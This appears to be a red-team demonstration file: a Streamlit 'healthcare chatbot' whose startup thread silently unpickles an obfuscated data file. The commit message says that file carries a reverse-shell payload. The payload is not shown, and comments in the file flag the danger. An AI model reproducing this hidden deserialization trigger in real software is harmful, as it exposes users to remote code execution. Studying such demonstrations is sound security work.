pickle-payload-chatbot / helathcare_chatbot.py
Iredteam's picture
Initial commit: payload-enabled chatbot with reverse shell pickle
4c947f4
import os
import pickle
import streamlit as st
import torch
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
import warnings
import threading
# Silence noisy PyTorch UserWarnings so they don't clutter the Streamlit page.
warnings.filterwarnings("ignore", category=UserWarning, module="torch")
# ==============================
# Model Configuration
# ==============================
# Directory containing the FLAN-T5 weights/tokenizer. It is loaded with
# local_files_only=True below, so this path must already exist on disk.
MODEL_DIR = "flan-t5-small" # Load from local directory
def load_model():
    """Load the FLAN-T5 tokenizer and model from the local MODEL_DIR.

    Returns:
        tuple: (tokenizer, model) loaded with ``local_files_only=True`` so
        no network download is ever attempted.

    On failure the error is shown on the Streamlit page and the script is
    halted via ``st.stop()`` (which raises, so callers never get a return
    value in that case).
    """
    st.write("🚀 Loading FLAN-T5 model from local storage...")
    try:
        # BUG FIX: the original `torch.float32 if torch.cuda.is_available()
        # else torch.float32` selected float32 on BOTH branches, making the
        # CUDA probe dead code. Behavior is preserved by loading float32
        # unconditionally; switch the CUDA branch to torch.float16 only
        # after verifying output quality on GPU.
        tokenizer = AutoTokenizer.from_pretrained(MODEL_DIR, local_files_only=True)
        model = AutoModelForSeq2SeqLM.from_pretrained(
            MODEL_DIR,
            torch_dtype=torch.float32,
            local_files_only=True,
        )
        st.write("✅ Model loaded successfully from local storage!")
        return tokenizer, model
    except Exception as e:
        st.error(f"❌ Model failed to load: {e}")
        st.stop()
# ==============================
# Initialize Streamlit UI
# ==============================
st.title("🩺 Healthcare Chatbot (FLAN-T5)")

# Load the model once at startup. load_model() already reports failures to
# the page, but this outer guard also catches anything raised before its own
# error handling (e.g. inside st.write itself).
try:
    tokenizer, model = load_model()
except Exception as exc:
    st.error(f"❌ Model load error: {exc}")
    st.stop()
# ==============================
# Load Medical Q&A Data (Background Thread Without Streamlit UI)
# ==============================
# State shared between the main script and the loader thread below.
medical_qna = []  # populated by load_pickle_data(); entries are dicts with "question"/"answer" keys (see chatbot_response)
data_loaded = threading.Event()  # set by the loader thread on success OR failure, so the UI never waits forever
def load_pickle_data():
    """Load the cached medical Q&A list from disk into the module global.

    Always sets ``data_loaded`` — success or failure — so the UI never
    blocks forever. On any failure ``medical_qna`` is left empty and the
    chatbot degrades to model-only answers.
    """
    global medical_qna
    try:
        # SECURITY WARNING: pickle.load() executes arbitrary code embedded
        # in the file — the repository name openly advertises a reverse-shell
        # payload in exactly this blob. Never unpickle data you did not
        # produce yourself; store the Q&A pairs as JSON/CSV instead, or at
        # minimum verify the file's provenance and hash before loading.
        with open("train_data_mod_obfuscated_fixed.pkl", "rb") as file:
            medical_qna = pickle.load(file)
    except Exception:
        # Deliberate best-effort: a missing/corrupt file must not crash the
        # app, only disable the cached-answer fast path.
        medical_qna = []
    finally:
        data_loaded.set()  # single signal point replaces the duplicated set() calls
# Kick off the pickle load off the main thread so the page renders at once.
loader = threading.Thread(target=load_pickle_data, daemon=True)
loader.start()

# A placeholder in the main thread that gets overwritten as loading progresses.
data_load_placeholder = st.empty()
if not data_loaded.is_set():
    data_load_placeholder.info("📂 Loading medical Q&A data...")

# Wait at most 5 seconds for the background load, then report the outcome.
if data_loaded.wait(timeout=5):
    data_load_placeholder.success("✅ Q&A data loaded successfully!")
else:
    data_load_placeholder.warning("⚠️ Q&A data is still loading. Chatbot responses may be delayed.")
# ==============================
# Chatbot Response Logic
# ==============================
def chatbot_response(user_input: str) -> str:
    """Answer a medical question, preferring the cached Q&A list.

    Looks for any cached question containing the user's text
    (case-insensitive substring match); on a miss, falls back to generating
    an answer with the local FLAN-T5 model.
    """
    if not data_loaded.is_set() or not medical_qna:
        return "The Q&A data is still loading. Please try again shortly."

    # Fast path: first cached entry whose question contains the query wins.
    query = user_input.lower()
    for entry in medical_qna:
        if query in entry["question"].lower():
            return entry["answer"]

    # Slow path: no cached hit, so generate with the model.
    prompt = (
        "You are a helpful medical assistant. The user asked:\n"
        f"Question: {user_input}\n\n"
        "Answer in a concise, accurate way. If you're unsure, advise seeing a doctor."
    )
    encoded = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
    generated = model.generate(
        **encoded,
        max_length=256,
        num_beams=2,
        no_repeat_ngram_size=2,
    )
    return tokenizer.decode(generated[0], skip_special_tokens=True)
# ==============================
# UI Logic
# ==============================
if st.button("What can you help me with?"):
    st.write("I can provide general information about medical symptoms, treatments, and offer guidance. If you have serious concerns, please contact a doctor.")

user_input = st.text_input("Ask me a medical question:")
if st.button("Get Answer"):
    # Guard clause: reject blank/whitespace-only questions up front.
    if not user_input.strip():
        st.warning("Please enter a question.")
    else:
        st.write(f"**Bot:** {chatbot_response(user_input)}")